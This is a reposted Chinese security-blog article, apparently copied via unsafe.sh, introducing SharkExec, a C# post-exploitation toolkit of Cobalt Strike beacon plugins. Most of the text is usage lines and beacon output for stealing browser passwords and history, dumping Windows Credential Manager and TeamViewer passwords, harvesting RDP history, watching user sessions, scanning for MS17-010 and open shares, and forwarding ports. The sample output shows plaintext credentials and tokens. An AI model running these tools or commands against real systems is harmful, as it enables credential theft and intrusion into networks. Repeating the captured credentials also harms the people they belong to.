功能说明
做红队时期自己coding的轮子,积累一些实用小功能,整个项目基于C#可自行定制cobaltstrike插件
SharkBrower
当前用户只能获取当前用户浏览器密码
管理员权限能获取所有用户浏览器密码
普通用户可以获取所有浏览器历史
参数
C:\SharkProExec\SharkBrowser\bin\Debug>SharkBrowser.exeUsage:.\SharkBrowser.exe -p allArguments:-p - all,Chrome,FireFox (<=57),-h - all,chrome,firefox,360es,360chrome,IE num-f - 360chromeeg: SharkBrowser.exe -p allSharkBrowser.exe -h all 100beacon> shark browser credent all[*] Tasked beacon to run .NET program: SharkBrowser.exe -p all[+] host called home, sent: 698423 bytes[+] received output:[*]: Try to get Chrome Credential[*]: Try to get Fucku Chrome Credential[+] received output:[+]: URL:https://cmd5.com/login.aspx Username:[email protected] Password:qweqwe[*]: Get Fucku Chrome Credential End[*]: Try to get FireFox Credential[*]: Try to get Fucku FireFox Credential[+]: found url:https://qianxin.webex.com.cn, Failed! to decrypt password[+]: found url:https://cmd5.com, Failed! to decrypt password[*]: Get Fucku FireFox Credential endbeacon> shark browser history ie 4[*] Tasked beacon to run .NET program: SharkBrowser.exe -h ie 4[+] host called home, sent: 698425 bytes[+] received output:[*]: Try to get DESKTOP-NFGMGRP\Fucku IE Histroy num: 4[+]: Title: url:http://127.0.0.1:8080/t2/admin[+]: Title: url:http://127.0.0.1:8080/t2/login2?password=pass[+]: Title: url:http://sdjwxt.syu.edu.cn/jsxsd[+]: Title: url:http://cmd5.com/[*]: Try to get DESKTOP-NFGMGRP\Fucku IE Histroy num:4 Endbeacon> shark browser history chrome 5[*] Tasked beacon to run .NET program: SharkBrowser.exe -h chrome 5[+] host called home, sent: 698433 bytes[+] received output:[*]: Try to get Chrome Histroy count:5[*]: Try to get Fucku Chrome Histroy count:5[+] received output:[+]: Title:Aggressor Script Tutorial and Reference url:https://www.cobaltstrike.com/aggressor-script/beacon.html[*]: Get Fucku Chrome Histroy End
SharkCredentials
system权限运行
win|web
x64|x86
默认.NET3.5以上版本可以编译,通过外部引用.net3.5 system.core 可以实现在.net2.0环境中编译。
通过外部引用system.core.dll 属性嵌入编译
相对于mimikatz vault::cred 能抓到更多得密码,
经测试发现直接在本地执行mimikatz.exe回显结果比较全
参数
C:\SharkProExec\SharkCredentials\bin\Debug>SharkCredentials.exeUsage:.\SharkCredentials.exe -c allArguments:-c - all,web,windowseg: SharkCredentials.exe -c webSharkCredentials.exe allbeacon> shark credent win x64[*] Tasked beacon to run .NET program: SharkCredentials_x64.exe -c windows[+] host called home, sent: 862783 bytes[+] received output:*: Try to get Windows Credentials[+] received output:[+]: OWNER:Fucku TARGET:LegacyGeneric:target=git:https://github.com USERNAME:LegacyGeneric:target=git:https://github.com PASSWORD:Test TIME:Test.[+]: OWNER:Fucku TARGET:LegacyGeneric:target=TERMSRV/192.168.47.128 USERNAME:LegacyGeneric:target=TERMSRV/192.168.47.128 PASSWORD:DESKTOP-NFGMGRP\administrator TIME:[+]: OWNER:Fucku TARGET:LegacyGeneric:target=MicrosoftAccount:[email protected]163.com USERNAME:LegacyGeneric:target=MicrosoftAccount:[email protected]163.com PASSWORD:[email protected]163.com TIME:[+]: OWNER:Fucku TARGET:WindowsLive:target=virtualapp/didlogical USERNAME:WindowsLive:target=virtualapp/didlogical PASSWORD:02uoxmeoatckoqhf TIME:[+]: OWNER:Fucku TARGET:LegacyGeneric:target=OneDrive USERNAME:LegacyGeneric:target=OneDrive PASSWORD:154c3c5bcf361ef6 TIME:4d 43 51 4c 7a 6e 54 74 5a 67 43 79 4f 63 79 77 31 35 38 63 52 75 67 38 6c 5a 42 44 69 6c 72 74 6f 57 62 44 32 43 72 68 6f 6b 6c 72 7a 70 6e 57 63 53 31 71 52 74 2a 64 4b 59 33 53 59 32 59 65 75 33 53 49 73 55 35 31 77 4d 52 51 59 45 76 4c 4d 30 39 49 4a 68 4f 2a 77 41 78 6f 4d 31 65 32 41 44 46 4e 31 42 4a 30 68 46 78 79 4c 36 4f 33 38 7a 58 6f 47 65 65 38 78 70 75 51 45 37 62 64 51 57 42 69 73 63 64 75 47 62 50 77 61 43 46 4a 43 77 50 46 33 32 71 54 4c 38 55 53 66 41 78 6d 45 39 76 47 4a 34 78 61 48 65 5a 62 4d 49 6e 57 4d 4a 38 6c 54 72 55 66 64 65 50 5a 59 4c 56 77 54 57 7a 4a 41 6c 78 46 2a 70 52 62 49 43 6f 7a 45 4a 32 57 37 74 58 53 44 63 65 4e 47 4b 39 77 6f 2a 34 73 57 46 55 43 74 45 4b 7a 6a 54 62 34 75 53 38 67 76 6a 55 42 54 48 59 66 75 5a 48 2a 2a 4b 4a 55 75 71 49 34 44 73 6d 38 6c 6e 6b 4e 21 44 34 69 31 77 77 6f 77 4c 67 5a 62 79 6c 58 6a 63 74 2a 2a 6f 78 66 6c 55 6b 34 48 54 39 2a 79 64 53 4f 64 56 37 64 30 77 4c 73 6f 4e 38 50 55 30 4f 36 56 38 48 4a 52 74 55 51 69 21 71 6a 46 38 45 78 67 30 74 7a 6b 6a 70 7a 31 6f 44 6f 4b 6b 49 39 33 56 70 61 58 39 21 4e 6e[+]: OWNER:Fucku TARGET:LegacyGeneric:target=qqq USERNAME:LegacyGeneric:target=qqq PASSWORD:qqq TIME:wqqq[+]: OWNER:Fucku TARGET:Domain:target=11 USERNAME:Domain:target=11 PASSWORD:11 TIME:11*: Try to get Windows Credentials end
SharkDump
通过teamview 窗口获取访问密码
参数
C:\SharkProExec\SharkDump\bin\Debug>SharkDump.exeUsage:.\SharkDump.exe -p tvArguments:-p tveg: SharkDump.exe -p tv
SharkInfo
收集本机关联IP
MstscIp
EventIp
Connection Ip
IE
参数
C:\SharkProExec\SharkInfo\bin\Debug>SharkInfo.exeUsage:.\SharkInfo.exe -aArguments:-a ipeg: SharkInfo.exe -a ip
SharkMonitor
通过API获取用户登录,net use进行挂盘监听
参数
C:\SharkProExec\SharkMonitor\bin\Debug>SharkMonitor.exeArguments:-t Time interval per scan( default:3000)eg: SharkMonitor.exe -t 50000
SharkRdp
获取rdp相关记录
mstsc
log
参数
C:\SharkProExec\SharkRdp\SharkRdp\bin\Debug>SharkRdp.exeUsage:.\SharkRdp.exe -r all 10Arguments:-r - all,log,mstsc default num :10eg: SharkRdp.exe -r allSharkRdp.exe -r mstsc 10beacon> shark rdp all[*] Tasked beacon to run .NET program: SharkRdp.exe -r all[+] host called home, sent: 114233 bytes[+] received output:[*]: Try to get rdp log num: 10[+]: USERNAME: DESKTOP-NFGMGRP$ DOAMIN:WORKGROUP IP:-[+]: USERNAME: DESKTOP-NFGMGRP$ DOAMIN:WORKGROUP IP:-[+] received output:[+]: USERNAME: - DOAMIN:- IP:-[+]: USERNAME: DESKTOP-NFGMGRP$ DOAMIN:WORKGROUP IP:-[+]: USERNAME: DESKTOP-NFGMGRP$ DOAMIN:WORKGROUP IP:-[+]: USERNAME: DESKTOP-NFGMGRP$ DOAMIN:WORKGROUP IP:-[+]: USERNAME: DESKTOP-NFGMGRP$ DOAMIN:WORKGROUP IP:-[+]: USERNAME: DESKTOP-NFGMGRP$ DOAMIN:WORKGROUP IP:-[+]: USERNAME: DESKTOP-NFGMGRP$ DOAMIN:WORKGROUP IP:-[+]: USERNAME: DESKTOP-NFGMGRP$ DOAMIN:WORKGROUP IP:-[*]: Try to get DESKTOP-NFGMGRP\Fucku MSTSC Histroy num: 10[+]: 192.168.47.100[+]: 192.168.47.128[+]: 192.168.47.8[*]: Try to get DESKTOP-NFGMGRP\Fucku MSTSC Histroy num: 10 End
SharkScan
port
alive
netshare
ms17010
NBNS/多网卡
参数
C:\SharkProExec\SharkScan\bin\Debug>SharkScan.exeUsage:.\SharkScan.exe action [-ips|-ipf] -p -tp -A -pingArguments:action port | alive | netshare| ms17010-ips: 127.0.0.1-127.0.0.24 | 127.0.0.1/24 | 127.0.0.1,127.0.0.2-ipf c:\host.txt-p 80,8080|80-88-tp default 0-A get server name-ping pingeg: SharkScan.exe port -ips 192.168.220.1/24 -p 30,31 -tp 10 -out D:\12.txtSharkScan.exe ms17010 -ipf c:\1.txt -out D:\12.txtSharkScan.exe alive -ips 192.168.47.99-192.168.47.200 -out D:\12.txtSharkScan.exe netshare -ips 192.168.47.99-192.168.47.200 -out D:\12.txt
C:\Debug>SharkScan.exe port -ips 10.10.172.226/24 -p 445 -A[*] : Remove duplicate ip count: 253[*] : Ip Count:253 Port Count:1[*] : Start Scanning Port[+] : 10.10.172.18 445 hostname ad.cn Windows 10 Enterprise 6.3 10.10.172.18, 192.168.137.1
C:\Debug>SharkScan.exe netshare -ips 10.10.172.226/24[*] : Start Scanning NetShare[+] : \\10.10.172.183\F$ requirePassword[+] : \\10.10.172.181\share Available[+] : \\10.10.172.183\IPC$ UnAvailable[+] : \\10.10.172.138\print$ AvailableC:\Debug>SharkScan.exe ms17010 -ips 10.10.172.226[*] : Remove duplicate ip count: 1[*] : Start Scanning Port[+] : 10.10.172.226 445[*] : Scan Port End[*] : Start Scanning MS17010[-] : 10.10.172.226 ms17010 Is Vulnerable[*] : Scan MS17010 End
SharkSession
ips 192.168.1.1,192.168.1.2 目标ip,可以是多个
-u user1,user2 监听空户名,可以是多个,当索引到用户session时会打印数据
-r 每间隔多少秒获取一次
-out 保存的路径
参数
C:\SharkProExec\SharkSession\bin\Debug>SharkSession.exeUsage:.\SharkSession.exe ip user -r time -out logfile: ip 192.168.1.111-u user1,user2-l show all-r 6-out c;\1.logeg: SharkSession.exe 192.168.1.111SharkSession.exe 192.168.1.111 -u user1,user2 -l -r 6 -out C:\1.txt
beacon> shark session 192.168.47.111
[*] Tasked beacon to run .NET program: SharkSession.exe 192.168.47.111[+] host called home, sent: 119379 bytes[+] received output:[*] : Start Dump Session[+] received output:[*] : 2020/2/25 22:55:20 192.168.47.111 > cname \\192.168.47.128 clinet liming[*] : Dump Session End
beacon> shark session 192.168.47.111 -u liming -r 5 -out c:\users\liming\session2.txt[*] Tasked beacon to run .NET program: SharkSession.exe 192.168.47.111 -u liming -r 5 -out c:\users\liming\session2.txt[+] host called home, sent: 119465 bytes[+] received output:[*] : Start Dump Session[+] received output:[+] : 2020/2/25 23:04:28 192.168.47.111 > cname \\192.168.47.128 clinet liming
SharkTools
转发端口
bypass
参数
C:\SharkProExec\SharkTools\bin\Debug>SharkTools.exeArguments:-a pf-lp: 8081-rh 123.1.1.1-rp 8081eg: SharkTools.exe -a pf -lp 8081 -rh 123.1.1.1 -rp 8081
SharkZip
zip
unzip
参数
C:\SharkProExec\SharkZip\bin\Debug>SharkZip.exeUsage:.\SharkZip.exe action type argsArguments:action u|ztype dir|fileeg: SharkZip.exe u d:\\1.zip d:\\fileSharkZip.exe z dir d:\\files\ d:\\1.zipSharkZip.exe z file d:\\1.txt d:\1.zipbeacon> shark zip z file D:\12.txt D:\12.zip[*] Tasked beacon to run .NET program: SharkZip.exe z file D:\12.txt D:\12.zip[+] host called home, sent: 310879 bytes[+] received output:[+]: Zip to directory D:\12.zipbeacon> shark zip u D:\12.zip D:\12[*] Tasked beacon to run .NET program: SharkZip.exe u D:\12.zip D:\12[+] host called home, sent: 310863 bytes[+] received output:[+]: Unzip to directory D:\12
更新说明
2021.1.18 -- 去除IP重复项
2021.1.15 -- 添加netshare扫描
2020.5.24 -- 添加toolsi集成了端口转发
2020.5.13 -- 添加dump teamviewer 密码
2020.5.14 -- 添加360浏览器历史
感谢
这个圈子太浮躁,致敬那些安心做技术的hacker
转载:https://github.com/F3eev/SharkExec作者:F3eev欢迎大家去关注作者
欢迎师傅加入安全交流群(qq群:611901335),或者后台回复加群
如果想和我一起讨论,欢迎加入我的知识星球!!!
扫描下图加入freebuf知识大陆
师傅们点赞、转发、在看就是最大的支持
后台回复知识星球或者知识大陆也可获取加入链接(两个加其一即可)
文章来源: http://mp.weixin.qq.com/s?__biz=MzkxMDMwNDE2OQ==&mid=2247490725&idx=1&sn=98976446d4b6509028adced6e9500d30&chksm=c12c2a63f65ba37538577fc990494ce74fd57e3cc91df6d879ac0264ec4db8c3b3684b625731#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh